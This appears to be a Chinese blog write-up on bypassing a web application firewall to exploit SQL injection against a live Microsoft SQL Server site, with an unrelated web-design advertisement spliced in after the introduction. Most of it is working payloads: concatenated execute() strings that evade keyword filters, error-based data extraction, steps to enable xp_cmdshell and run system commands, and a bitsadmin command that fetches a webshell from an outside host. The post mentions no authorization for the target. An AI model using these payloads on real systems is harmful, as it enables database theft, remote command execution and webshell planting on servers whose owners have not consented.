MSSQLWAF绕过(2)

0x00 前言

上次的绕过太简单，也没有能注出数据或者获取权限，这次继续绕过，获取数据

创新互联公司专注于企业全网整合营销推广、网站重做改版、伊州网站定制设计、自适应品牌网站建设、H5网站设计、商城网站建设、集团公司官网建设、外贸营销网站建设、高端网站制作、响应式网页设计等建站业务，价格优惠性价比高，为伊州等各大城市提供网站开发制作服务。

0x01 过程

还是上次的站点，简单的判断，存在注入

发现and 数字、exec、union select、 select 数字。。。被过滤

发现execute函数没被过滤，狗没出来说明这个函数能用

execute('sql语句')  //execute函数中可以写sql语句，且为字符串，那么就可以传入一些变形字符串来绕过waf

本地验证一下

一些变形

只是本次使用sql server堆叠注入，并不会将数据展示在页面，所以要让这一次的堆叠出错，达到报错注入的效果

execute('select convert(int,@@version)') --a

当然需要变形一下，不然会被拦截，因为出现了select

execute('sel'%2b'ect convert(int,@@version)') --a   //在url编码中 %2b 等价与 + 所以可以理解为 'sel' + 'ect'

通过execute函数，可进行变形导致waf无法拦截，获取数据或执行sql语句就变得简单多了
执行cmdshell，由于cmdshell不能通过报错回显，但是可以将结果重定向到文件中或写入表中

execute('master..xp_cmdshell whoami > e:\'%2b'\xx\'%2b'\1.txt')  // 双斜杠被过滤

返回报错并没有关系，waf没有拦截，查看1.txt是否有数据

0x02 后续

本来想写入webshell或通过公网下载webshell，但服务器不能出外网，且有waf，导致写shell失败，考虑后想kill掉waf，但还是避免对服务器造成影响。。

0x03 其他

附上其他在这次测试中用到的命令

execute('sp_configure "show advanced options",1')
execute('reconfigure')
execute('sp_configure "xp_cmdshell", 1')
execute('reconfigure')   //上述四步，使xp_cmdshell开启

execute('master..xp_cmdshell "bitsadmin /transfer n http://xxxxx/1.aspx c:\\路径\\123.aspx"')  //从公网下载webshell，本文中因机器不能出外网导致下载失败